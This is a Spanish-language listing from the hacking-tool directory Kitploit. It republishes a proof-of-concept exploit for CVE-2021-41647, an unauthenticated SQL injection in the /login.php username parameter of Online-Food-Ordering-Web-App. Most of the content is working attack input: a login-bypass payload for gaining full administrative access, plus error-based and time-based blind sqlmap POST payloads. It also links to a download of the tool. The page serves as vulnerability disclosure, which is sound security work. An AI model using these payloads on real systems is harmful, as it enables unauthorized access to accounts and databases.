Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41647 — Prueba de concepto de explotación para inyección SQL no autenticada en Online-Food-Ordering-Web-App, que demuestra técnicas de omisión de inicio de sesión e inyección ciega basada en errores y tiempo. | Kitploit
Herramientas/GitHubGitHub/mobiusbinary/cve-2021-41647
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Prueba de concepto de explotación para inyección SQL no autenticada en Online-Food-Ordering-Web-App, que demuestra técnicas de omisión de inicio de sesión e inyección ciega basada en errores y tiempo.

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41647

CVE-2021-41647 Inyección SQL en Online-Food-Ordering-Web-App

La aplicación Online-Food-Ordering-Web-App es vulnerable a ataques de inyección SQL no autenticados, tanto basados en error como a ciegas basados en tiempo. El parámetro username de la página /login.php no sanitiza la entrada del usuario, por lo que un atacante puede evadir el inicio de sesión mediante una sencilla técnica de bypass.

Enlace a la aplicación

Online-Food-Ordering-Web-App

Componentes afectados y parámetro

URL: /login.php
PARÁMETRO: username

POCs

PAYLOAD DE BYPASS DE LOGIN

Para evadir el inicio de sesión del usuario y obtener acceso administrativo completo, introduce el payload en el campo de entrada username: user' or 1=1-- -

PAYLOADS DE SQLMAP

Parámetro: username (petición POST) Tipo: basado en error Título: MySQL >= 5.0 y basado en error - cláusula WHERE, HAVING, ORDER BY o GROUP BY (FLOOR) Payload:


username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Tipo: ciego basado en tiempo Título: MySQL >= 5.0.12 y ciego basado en tiempo (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Si la imagen del POC no es clara, haga clic en el GIF, que se cargará en una mejor resolución.

POC

Descubierto por

Jason Colyvas
MOBIUSBINARY
20 de septiembre de 2021

Descargar herramienta